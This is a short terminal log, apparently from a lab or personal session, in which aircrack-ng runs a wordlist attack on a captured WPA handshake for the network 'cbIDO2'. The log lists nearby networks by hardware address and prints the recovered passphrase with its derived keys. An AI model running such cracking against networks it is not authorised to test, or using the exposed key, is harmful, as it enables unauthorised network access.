[slaynpool@MiniZbeub]puce$ aircrack-ng -w ../dico.txt Cpt.pcap 
Reading packets, please wait...
Opening Cpt.pcap
Read 1774 packets.
   #  BSSID              ESSID                     Encryption

   1  00:3A:99:2B:1D:40                            Unknown
   2  00:3A:9A:24:58:E0                            Unknown
   3  00:3A:9A:24:58:E3  IUTBEZIERS                Unknown
   4  00:3A:9A:24:58:E5  eduroam                   Unknown
   5  00:3A:9A:24:58:E6                            Unknown
   6  00:3A:9A:F4:2C:D0                            Unknown
   7  24:0A:C4:1D:1A:59  xxxxxxxx                  Unknown
   8  24:0A:C4:1D:2B:39  cestquoilecode            WPA (0 handshake)
   9  24:0A:C4:1D:37:4D  floflo                    Unknown
  10  24:0A:C4:1D:3A:D9  habibi                    WPA (0 handshake)
  11  24:0A:C4:1D:46:51  Skrr                      Unknown
  12  24:0A:C4:1D:49:A5  Cookie                    Unknown
  13  24:0A:C4:1D:4B:E1  Durel                     Unknown
  14  5E:CF:7F:1B:74:2F  cbIDO2                    WPA (1 handshake)
  15  D2:53:DA:05:04:28                            WEP (1 IVs)
Index number of target network ? 14
Reading packets, please wait...
Opening Cpt.pcap
Read 1774 packets.
1 potential targets
                         Aircrack-ng 1.6 rev e708c21e

      [00:02:14] 1092856/1814400 keys tested (8301.35 k/s) 

      Time left: 1 minute, 26 seconds                           60.23%

                           KEY FOUND! [ 61495327 ]


      Master Key     : D0 A2 CB DF CB 06 20 13 EC BC F1 41 74 E5 61 C7 
                       45 CE 3A 9A 69 7A EC 1C DB 40 B5 78 A0 82 FB F9 

      Transient Key  : 45 D5 4A AB 74 51 2F 77 B3 31 F6 5B A4 B6 1B AF 
                       D8 D4 1F 41 54 AF B4 BB DF 0F 65 A5 C7 ED 04 B7 
                       CB CB CE BA 80 8A C9 34 AE FA 74 58 A3 A4 67 03 
                       3B 48 88 CE 92 31 C3 0A D8 5E 7C 10 05 0E DE DA 

      EAPOL HMAC     : D6 E0 B8 41 AC 91 0F 52 0E 0A EC 81 A4 C5 EB E6 

